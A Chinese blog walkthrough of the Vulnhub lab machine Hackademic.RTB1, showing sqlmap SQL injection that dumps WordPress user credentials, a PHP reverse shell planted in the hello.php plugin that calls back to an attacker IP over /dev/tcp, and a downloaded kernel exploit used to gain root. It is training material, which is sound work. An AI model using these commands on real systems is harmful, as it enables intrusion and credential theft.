Vulnhub系列靶机-Hackadmeic.RTB1

文章目录

  • Vulnhub系列靶机-Hackadmeic.RTB1
    • [1. 信息收集](#1. 信息收集)
      • [1.1 主机扫描](#1.1 主机扫描)
      • [1.2 端口扫描](#1.2 端口扫描)
      • [1.3 目录爆破](#1.3 目录爆破)
    • [2. 漏洞探测](#2. 漏洞探测)
    • [3. 漏洞利用](#3. 漏洞利用)
      • [3.1 反弹Shell](#3.1 反弹Shell)
    • [4. 内核提权](#4. 内核提权)

Vulnhub系列靶机-Hackadmeic.RTB1

1. 信息收集

1.1 主机扫描

sh 复制代码
arp-scan -l

1.2 端口扫描

sh 复制代码
nmap -A -p- 192.168.188.184

扫描到了22端口和80端口,但是22端口的关闭的。

访问Web页面。

使用浏览器插件Wappalyzer扫描网站

看到WordPress,数据库是MySQL,语言是PHP。

根据首页中显示的内容,点击target

页面提示告诉我们要读取root目录下的Key.txt文件。

1.3 目录爆破

爆破/Hackademic_RTB1/网页目录

sh 复制代码
dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200

观察发现有一个登录页面wp-login.php。

2. 漏洞探测

在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

复制代码
http://192.168.188.184/Hackademic_RTB1/?cat=1

尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

3. 漏洞利用

使用SqlMap工具进行SQL注入。

查看数据库

sh 复制代码
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch 

查看数据库中有哪些表

sh 复制代码
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch

查看wp_users表中字段

sh 复制代码
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch

这里我们只关注user_login和user_pass字段。

获取字段信息

sh 复制代码
sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch

这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

3.1 反弹Shell

php 复制代码
system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");

kali中开启监听

sh 复制代码
nc -lnvp 8888

提交之后,需要获取到上传的路径,才可以触发反弹shell。

之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

点击hello.php后触发反弹shell

4. 内核提权

查看内核版本

sh 复制代码
uname -a

搜索系统内核版本漏洞

sh 复制代码
searchsploit 2.6.3 | grep "Local Privilege Escalation"

查看完整路径

sh 复制代码
searchsploit -p linux/local/15285.c 
复制代码
/usr/share/exploitdb/exploits/linux/local/15285.c

将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

sh 复制代码
python3 -m http.server 9999

然后切换到tmp目录,执行wget命令下载该工具

sh 复制代码
wget http://192.168.188.157:9999/15285.c

然后赋予该文件可执行权限

sh 复制代码
chmod 777 15285.c

将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

执行exp文件

查看key.txt文件。

相关推荐
ba_pi32 分钟前
每天写点什么2026-02-04(2.1)信息安全
安全·web安全
枷锁—sha1 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
菩提小狗1 小时前
小迪安全2023-2024|第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_笔记|web安全|渗透测试|
笔记·安全·web安全
聚铭网络1 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
Mintopia3 小时前
Web 安全与反编译源码下的权限设计:构筑前后端一致的防护体系
前端·安全
Mintopia3 小时前
Web 安全与反编译源码下的权限设计:构建前后端一体的信任防线
前端·安全·编译原理
darkb1rd4 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
天若有情6734 小时前
【自研实战】轻量级ASCII字符串加密算法:从设计到落地(防查岗神器版)
网络·c++·算法·安全·数据安全·加密
darkb1rd4 小时前
七、PHP配置(php.ini)安全最佳实践
安全·php·webshell
迎仔8 小时前
11-云网络与混合云运维:弹性数字世界的交通管理
网络·安全·web安全